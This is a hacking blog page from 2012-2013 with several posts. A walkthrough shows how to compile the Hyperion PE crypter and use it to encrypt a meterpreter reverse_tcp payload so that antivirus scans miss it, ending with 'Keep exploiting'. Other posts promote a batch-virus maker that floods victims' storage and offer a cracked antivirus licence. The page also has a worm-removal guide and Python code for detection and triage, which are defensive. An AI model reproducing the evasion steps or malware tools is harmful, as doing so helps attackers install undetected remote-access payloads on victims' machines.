
Saturday 20 July 2013

How To Make your Viruses, Payloads, Rat, Key-logger, fully Undetectable From Anti-viruses

Hi to all,

Requirements:-
1. BackTrack 5 or any Linux distro that has msfencode
2. Your own virus/RAT/keylogger engine; mine is test1.exe
Follow the commands shown in the figure:-
Perform all steps with root permission.

If you have any query, write in the comments below...
We will try to figure it out.

Tuesday 16 July 2013

How To Create Virus Without Any Programming Knowledge

Hi To All 

Tool Name:- Sonic Bat Batch File Virus Maker



[Image: batch virus]

This program creates batch (.bat) viruses and has various options to ruin the victim's computer in different ways. It can flood the storage space on the victim's computer by creating a large number of files in different folders using its "folder flood" feature. It also includes a bat-to-exe converter to turn your batch virus files into exe programs, and an icon changer. Try it and enjoy...
If you face any trouble, please comment below; your queries are valuable to us...

Saturday 13 July 2013

AVG Antivirus Full Version Free Download Licences Till 2018

Hi To All 
After a short holiday, I am here to share my toolbox with your empty drives, so I am not going to explain much, because if you were googling for this post then it's your turn; yes, you got your page for downloading the full version of AVG Antivirus.



Sunday 13 January 2013

Thursday 15 November 2012

Bypassing Antivirus with PE Crypters by Shubham Mittal (@k@ Upgoingstaar)

Well, most of the time when we do a penetration test we face a super cool AV protection which stops us from executing our lovely EXEs, shellcodes, etc.

I was looking around at the same and, from a presentation by Mr. Dave Kennedy at DerbyCon, I got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging here and there, I found that shellcodexec is a small utility to inject a shellcode into any process and thus execute your malicious intentions. The approach is that when there is no file at all, what signature will AVs match? However, shellcodexec is itself getting caught nowadays and therefore I will not suggest you go for it.

On the other hand, PE Crypters (from the Nullsecurity team) will encrypt a binary file with a sexy crypting approach and thus can be used to bypass the AV. The whole project runs under the name HYPERION and is a proper working way to mess around with AVs. So let's start.

Well, AVs have become great at detecting the templates with which we encrypt our EXEs, and likewise the decryption routine the program uses to reach the actual offset; once AVs started matching on those, the result was "Detection". In this PE crypter the payload is not scrambled; instead it is encapsulated. A different key is used as the cipher every time, and at execution time the key is brute forced. So it will take time, huh? Well, yeah, it will take time if our key is long. We will keep our key short and everything will go fine. This, in short, is what the Hyperion PE crypter does: a weak 128-bit AES key is used to encapsulate the packet, and it is simply brute forced at execution time. If you want to give it a hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf).

Anyway, for the super cool guys this was enough. But as only the source files are available for now, it can be a little troublesome for those who are new to these things :P. Well, let me give a walkthrough. First of all choose your platform; I'm preferring Linux all the way, but it's your system, and your choice too.

Next, download the project, or use:
wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip

Unzip it.

unzip Hyperion-1.0.zip

Change into the extracted directory (not the zip file) and compile it with the MinGW g++ under your Wine prefix (the default prefix for root is /root/.wine):

cd Hyperion-1.0

wine /root/.wine/drive_c/MinGW/bin/g++ Src/Crypter/*.cpp -o shubham.exe



Once you have created the executable for crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating an msfpayload for a reverse connection, and once it is crypted using Hyperion, it must bypass the AV and still send back the reverse connection.

Create the payload.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe

Scan it. 
Once the payload is ready, we will scan it first (without crypting).

Let's crypt it with Hyperion.

wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe


ls -l

Scan it.
No Detection

Execute it.
As soon as you execute it, it will start brute forcing the key, which will push CPU usage to 100%.

Enjoy it.
As soon as the brute force is over, CPU usage will drop back to normal and a session will be generated.
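The two effects the post describes at execution time, a freshly started process pegging the CPU while it brute forces its own key and then opening a reverse connection, are exactly what a defender can key on when the static scan says "No Detection". The following is an added example from the editor, not code from the post, Hyperion or Metasploit: it runs a behavioural rule over a hypothetical, constructed process-telemetry format (one event per line; not any real EDR schema) and flags only processes whose first outbound connection is preceded by a sustained CPU burst that began right after start. The 192.168.242.128:4444 endpoint is the one used in the post; every other value is constructed.

```python
"""Behavioural detection for the pattern described in the post: a freshly
started process pegs the CPU (runtime key brute force) and then opens an
outbound connection. Hypothetical telemetry format, constructed for this
example (not a real EDR schema): one event per line,
    <seconds-since-boot> <pid> <kind> <detail>
where kind is START (detail = image name), CPU (detail = percent busy in the
last one-second sample) or CONNECT (detail = remote ip:port)."""
from collections import defaultdict

# Constructed sample telemetry. pid 4242 shows the crypted-payload pattern;
# pid 1100 is a CPU-heavy compiler run with no network; pid 1300 connects
# without a CPU burst; pid 1500 connects first and only gets busy afterwards.
SAMPLE_TELEMETRY = """\
0 4242 START msf2.exe
1 4242 CPU 99
2 4242 CPU 100
3 4242 CPU 100
4 4242 CPU 98
5 4242 CPU 12
5 4242 CONNECT 192.168.242.128:4444
0 1100 START g++.exe
1 1100 CPU 100
2 1100 CPU 100
3 1100 CPU 100
4 1100 CPU 100
0 1300 START notepad.exe
1 1300 CPU 3
2 1300 CONNECT 10.0.0.5:80
0 1500 START browser.exe
1 1500 CONNECT 10.0.0.6:443
2 1500 CPU 95
3 1500 CPU 97
4 1500 CPU 96
"""


def parse_events(text):
    """Turn the line format above into (ts, pid, kind, detail) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, kind, detail = line.split(maxsplit=3)
        events.append((int(ts), int(pid), kind, detail))
    return events


def find_bruteforce_then_connect(events, cpu_threshold=90, min_busy_samples=3,
                                 start_slack=2):
    """Return one hit per pid whose first outbound connection is preceded by
    at least min_busy_samples CPU samples >= cpu_threshold, with the burst
    beginning within start_slack seconds of process start. CPU samples after
    the connection do not count, so a browser that gets busy after it
    connects is not flagged, and a busy process that never connects is not
    flagged either."""
    by_pid = defaultdict(list)
    for ev in events:
        by_pid[ev[1]].append(ev)

    hits = []
    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e[0])
        starts = [e for e in evs if e[2] == "START"]
        connects = [e for e in evs if e[2] == "CONNECT"]
        if not starts or not connects:
            continue
        start_ts, image = starts[0][0], starts[0][3]
        first_connect = connects[0]
        busy_before = [e[0] for e in evs
                       if e[2] == "CPU" and int(e[3]) >= cpu_threshold
                       and e[0] < first_connect[0]]
        if (len(busy_before) >= min_busy_samples
                and busy_before[0] - start_ts <= start_slack):
            hits.append({"pid": pid, "image": image,
                         "busy_seconds": len(busy_before),
                         "remote": first_connect[3]})
    return hits


if __name__ == "__main__":
    for hit in find_bruteforce_then_connect(parse_events(SAMPLE_TELEMETRY)):
        print("suspicious: pid %(pid)d %(image)s busy %(busy_seconds)ds "
              "then connected to %(remote)s" % hit)
```

The thresholds are deliberately parameters: a longer key means a longer burst, so raising min_busy_samples trades missed short brute forces for fewer false positives from ordinary CPU-heavy programs.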

I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)

Tuesday 13 November 2012

How to remove the New Folder.exe or regsvr.exe or autorun.inf virus


I want to tell you a story: two days back I got affected by this virus very badly, as it ate up all my empty hard disk space of around 700 MB.
The file which is responsible for all this is identified as WORM_DELF.FKZ. It is spreading mostly using pen drives as the medium.


Manual Process of Removal

1. Cut The Supply Line
   a. Search for the autorun.inf file. It is a read-only file, so you will have to change it to normal by right-clicking the file, selecting Properties and un-checking the Read-only option.
   b. Open the file in Notepad, delete everything and save the file.
   c. Now change the file status back to read-only so that the virus cannot get access to it again.
   d. Click Start -> Run, type msconfig and click OK.
   e. Go to the Startup tab, look for regsvr, uncheck the option and click OK.
   f. Click on Exit without Restart, because there are still a few things we need to do before we can restart the PC.
   g. Now go to Control Panel -> Scheduled Tasks and delete the At1 task listed there.

2. Open The Gates Of The Castle
   a. Click Start -> Run, type gpedit.msc and click OK.
   b. If you are a Windows XP Home Edition user you might not have gpedit.msc; in that case download and install it from Windows XP Home Edition: gpedit.msc and then follow these steps.
   c. Go to User Configuration -> Administrative Templates -> System.
   d. Find "Prevent access to registry editing tools" and change the option to Disabled.
   e. Once you do this you have registry access back.

3. Launch The Attack At The Heart Of The Castle
   a. Click Start -> Run, type regedit and click OK.
   b. Go to Edit -> Find and start the search for regsvr.exe.
   c. Delete all occurrences of regsvr.exe; remember to take a backup before deleting. KEEP IN MIND regsvr32.exe is not to be deleted. Delete regsvr.exe occurrences only.
   d. At one or two places you will find it after explorer.exe; in these cases delete only the regsvr.exe part and not the whole value. E.g. for Shell = "Explorer.exe regsvr.exe", just delete regsvr.exe and leave Explorer.exe.

4. Seek And Destroy The Enemy Soldiers; No One Should Be Left Behind
   a. Click Start -> Search -> For Files and Folders.
   b. There, click All files and folders.
   c. Type "*.exe" as the filename to search for.
   d. Click on the "When was it modified" option and select the specify date option.
   e. Type the From date as 11/14/2012 and also type the To date as 11/14/2012.
   f. Now hit Search and wait for all the exe's to show up.
   g. Once the search is over, select all the exe files and Shift+Delete them; take care that you don't delete a legitimate exe file that you installed on 31st January.
   h. Selecting a lot of files together might make your computer unresponsive, so delete them in small bunches.
   i. Also find and delete regsvr.exe and "svchost .exe" (notice the extra space between svchost and .exe).

5. Time For Celebrations
   a. Now do a cold reboot (i.e. press the reboot button instead) and you are done.

I hope this information helps you win your own battle against this virus. Soon all antivirus programs will be able to automatically detect and clean this virus. Also, I hope Avast finds a way to solve this issue.
As a side note, I have found a little watchdog (WinPatrol) that used to work perfectly on my old system. It was not there on my new PC; I have installed it again, as I want to stay ahead by forever closing the supply line of these viruses. You can download it from the WinPatrol website.
UPDATE: Avast Boot Time Scheduling
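The three places in the procedure above where a hand clean-up most often goes wrong are telling regsvr.exe apart from the legitimate regsvr32.exe, telling "svchost .exe" (with the space) apart from the real svchost.exe, and trimming the Winlogon Shell value without losing Explorer.exe. The following is an added example from the editor, not part of the original post: report-only triage helpers that encode those distinctions, plus a small autorun.inf reader that shows which program the file would launch (the post only says to blank the file; the open= and shellexecute= keys are the standard autorun.inf keys that name a program). All function names, the sample Shell value, the autorun.inf text and the file list are constructed stand-ins for what you would read off an infected machine.

```python
"""Offline triage helpers for the regsvr.exe / autorun.inf clean-up above.
Helper names are hypothetical and every input below is a constructed stand-in
for what you would read from the registry, the autorun.inf and a file search.
Nothing here deletes or modifies anything; it only reports."""
import ntpath

# Constructed inputs.
SAMPLE_SHELL_VALUE = "Explorer.exe regsvr.exe"   # the Winlogon Shell value from the post
SAMPLE_AUTORUN_INF = """\
[autorun]
open=regsvr.exe
icon=regsvr.exe,0
"""
SAMPLE_FOUND_FILES = [
    r"C:\WINDOWS\system32\regsvr32.exe",   # legitimate, must stay
    r"C:\WINDOWS\system32\svchost.exe",    # legitimate, must stay
    r"C:\WINDOWS\regsvr.exe",              # worm
    r"E:\svchost .exe",                    # worm, note the space
    r"E:\New Folder.exe",                  # worm
]


def clean_shell_value(shell):
    """Winlogon's Shell value should launch Explorer only. Remove every
    regsvr.exe token and keep the rest; regsvr32.exe is never touched because
    the comparison is on the whole token, not a substring."""
    return " ".join(tok for tok in shell.split() if tok.lower() != "regsvr.exe")


def classify_exe(path):
    """Return a reason string for files the post tells you to delete, or None
    for anything else, including the look-alike legitimate binaries."""
    name = ntpath.basename(path).lower()
    if name == "regsvr.exe":
        return "worm dropper regsvr.exe (not regsvr32.exe)"
    if name == "svchost .exe":
        return "worm copy with a space before .exe (not svchost.exe)"
    if name == "new folder.exe":
        return "worm copy disguised as a folder"
    return None


def autorun_launch_targets(inf_text):
    """Programs an autorun.inf would run: the open= and shellexecute= keys
    inside its [autorun] section."""
    targets, in_autorun = [], False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line.lower() == "[autorun]"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() in ("open", "shellexecute"):
                targets.append(value.strip())
    return targets


def triage(shell_value, inf_text, found_files):
    """Combine the checks into one report; the caller decides what to act on."""
    suspects = []
    for path in found_files:
        reason = classify_exe(path)
        if reason:
            suspects.append((path, reason))
    return {
        "shell_value_fixed": clean_shell_value(shell_value),
        "autorun_launches": autorun_launch_targets(inf_text),
        "suspect_files": suspects,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_SHELL_VALUE, SAMPLE_AUTORUN_INF, SAMPLE_FOUND_FILES)
    print("Shell value should become:", report["shell_value_fixed"])
    print("autorun.inf launches:", report["autorun_launches"])
    for path, reason in report["suspect_files"]:
        print("delete after backup:", path, "-", reason)
```

Feed it the real Shell value, the real autorun.inf text and the list from the "*.exe" search, and compare its suspect list against what you are about to Shift+Delete; anything it does not flag deserves a second look before it goes.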